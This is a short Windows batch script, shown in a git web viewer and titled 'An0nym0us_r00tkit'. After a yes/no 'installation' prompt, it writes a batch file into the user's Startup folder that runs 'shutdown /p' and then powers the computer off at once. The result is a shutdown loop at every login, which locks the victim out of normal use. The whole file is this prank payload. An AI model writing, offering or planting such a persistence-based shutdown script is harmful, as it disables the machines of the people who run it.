summaryrefslogtreecommitdiff
path: root/Deep Shutdown/deep_shutdown.bat
blob: ddf3766b995436137aea694534a14da4564d344e (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
@echo off
title An0nym0us_r00tkit
GOTO choice

:start
cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
echo @echo off > lol.bat
echo shutdown /p >>lol.bat
shutdown /p
break

:choice
color 0f
echo Do you want to begin the An0nym0us_r00tkit installation?[Yes/No]
set /p input=
if %input%==Y goto start
if %input%==y goto start
if %input%==yes goto start
if %input%==YES goto start
if %input%==Yes goto start
if %input%==N goto end
if %input%==n goto end
if %input%==no goto end
if %input%==NO goto end
if %input%==No goto end

:end
break